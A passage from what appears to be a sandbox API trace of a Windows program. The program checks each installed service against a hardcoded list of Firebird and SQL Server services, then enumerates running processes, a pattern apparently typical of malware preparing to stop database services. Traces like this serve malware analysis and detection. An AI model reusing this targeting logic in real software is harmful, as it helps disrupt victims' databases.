[0201.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0201.843] lstrlenW (lpString="ClickToRunSvc") returned 13 [0201.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0201.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0201.843] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0201.843] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0201.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0201.843] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0201.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0201.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0201.843] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0201.843] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0201.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0201.843] lstrlenW (lpString="CryptSvc") returned 8 [0201.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0201.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0201.843] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0201.843] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0201.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0201.844] lstrlenW (lpString="DcomLaunch") returned 10 [0201.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0201.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0201.844] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0201.844] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0201.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0201.844] lstrlenW (lpString="DeviceAssociationService") returned 24 [0201.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0201.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0201.844] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0201.844] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0201.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0201.844] lstrlenW (lpString="Dhcp") returned 4 [0201.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0201.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0201.844] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0201.844] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0201.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0201.844] lstrlenW (lpString="Dnscache") returned 8 [0201.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0201.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0201.844] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0201.844] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0201.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0201.844] lstrlenW (lpString="DPS") returned 3 [0201.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0201.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0201.844] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0201.844] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0201.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0201.845] lstrlenW (lpString="DusmSvc") returned 7 [0201.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0201.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0201.845] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0201.845] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0201.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0201.845] lstrlenW (lpString="EventLog") returned 8 [0201.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0201.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0201.845] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0201.845] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0201.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0201.845] lstrlenW (lpString="EventSystem") returned 11 [0201.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0201.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0201.845] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0201.845] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0201.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0201.845] lstrlenW (lpString="FontCache") returned 9 [0201.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0201.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0201.845] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0201.845] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0201.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0201.845] lstrlenW (lpString="gpsvc") returned 5 [0201.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0201.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0201.845] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0201.846] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0201.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0201.846] lstrlenW (lpString="iphlpsvc") returned 8 [0201.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0201.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0201.846] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0201.846] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0201.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0201.846] lstrlenW (lpString="KeyIso") returned 6 [0201.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0201.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0201.846] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0201.846] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0201.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0201.846] lstrlenW (lpString="LanmanServer") returned 12 [0201.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0201.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0201.846] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0201.846] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0201.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0201.846] lstrlenW (lpString="LanmanWorkstation") returned 17 [0201.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0201.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0201.846] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0201.846] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0201.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0201.846] lstrlenW (lpString="lfsvc") returned 5 [0201.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0201.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0201.847] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0201.847] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0201.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0201.847] lstrlenW (lpString="lmhosts") returned 7 [0201.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0201.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0201.847] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0201.847] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0201.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0201.847] lstrlenW (lpString="LSM") returned 3 [0201.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0201.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0201.847] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0201.847] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0201.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0201.847] lstrlenW (lpString="MpsSvc") returned 6 [0201.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0201.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0201.847] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0201.847] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0201.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0201.847] lstrlenW (lpString="NcbService") returned 10 [0201.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0201.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0201.848] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0201.848] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0201.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0201.848] lstrlenW (lpString="netprofm") returned 8 [0201.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0201.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0201.848] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0201.848] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0201.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0201.848] lstrlenW (lpString="NgcSvc") returned 6 [0201.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0201.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0201.848] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0201.848] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0201.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0201.848] lstrlenW (lpString="NlaSvc") returned 6 [0201.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0201.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0201.848] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0201.848] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0201.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0201.848] lstrlenW (lpString="nsi") returned 3 [0201.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0201.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0201.848] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0201.848] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0201.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0201.849] lstrlenW (lpString="PcaSvc") returned 6 [0201.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0201.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0201.849] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0201.849] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0201.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0201.849] lstrlenW (lpString="PlugPlay") returned 8 [0201.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0201.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0201.849] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0201.849] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0201.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0201.849] lstrlenW (lpString="Power") returned 5 [0201.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0201.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0201.849] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0201.849] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0201.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0201.849] lstrlenW (lpString="ProfSvc") returned 7 [0201.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0201.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0201.849] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0201.849] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0201.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0201.849] lstrlenW (lpString="RpcEptMapper") returned 12 [0201.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0201.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0201.849] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0201.850] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0201.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0201.850] lstrlenW (lpString="RpcSs") returned 5 [0201.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0201.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0201.850] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0201.850] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0201.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0201.850] lstrlenW (lpString="SamSs") returned 5 [0201.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0201.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0201.850] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0201.850] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0201.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0201.850] lstrlenW (lpString="Schedule") returned 8 [0201.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0201.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0201.850] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0201.850] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0201.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0201.850] lstrlenW (lpString="SecurityHealthService") returned 21 [0201.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0201.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0201.850] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0201.850] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0201.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0201.850] lstrlenW (lpString="SENS") returned 4 [0201.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0201.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0201.851] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0201.851] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0201.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0201.851] lstrlenW (lpString="ShellHWDetection") returned 16 [0201.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0201.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0201.851] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0201.851] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0201.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0201.851] lstrlenW (lpString="Spooler") returned 7 [0201.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0201.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0201.851] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0201.851] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0201.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0201.851] lstrlenW (lpString="StateRepository") returned 15 [0201.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0201.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0201.851] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0201.851] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0201.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0201.851] lstrlenW (lpString="SysMain") returned 7 [0201.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0201.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0201.851] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0201.851] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0201.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0201.851] lstrlenW (lpString="SystemEventsBroker") returned 18 [0201.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0201.852] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0201.852] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0201.852] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0201.852] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0201.852] lstrlenW (lpString="Themes") returned 6 [0201.852] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0201.852] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0201.852] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0201.852] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0201.852] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a4 [0202.050] Process32FirstW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.051] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0202.052] lstrlenW (lpString="System") returned 6 [0202.052] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0202.053] lstrlenW (lpString="smss.exe") returned 8 [0202.053] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0202.056] lstrlenW (lpString="csrss.exe") returned 9 [0202.056] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0202.057] lstrlenW (lpString="wininit.exe") returned 11 [0202.057] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0202.058] lstrlenW (lpString="csrss.exe") returned 9 [0202.058] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0202.058] lstrlenW (lpString="winlogon.exe") returned 12 [0202.058] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0202.059] lstrlenW (lpString="services.exe") returned 12 [0202.059] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0202.060] lstrlenW (lpString="lsass.exe") returned 9 [0202.060] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0202.061] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0202.061] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0202.062] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0202.062] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.063] lstrlenW (lpString="svchost.exe") returned 11 [0202.063] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.064] lstrlenW (lpString="svchost.exe") returned 11 [0202.064] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0202.068] lstrlenW (lpString="dwm.exe") returned 7 [0202.068] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.069] lstrlenW (lpString="svchost.exe") returned 11 [0202.069] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.070] lstrlenW (lpString="svchost.exe") returned 11 [0202.070] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.071] lstrlenW (lpString="svchost.exe") returned 11 [0202.071] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 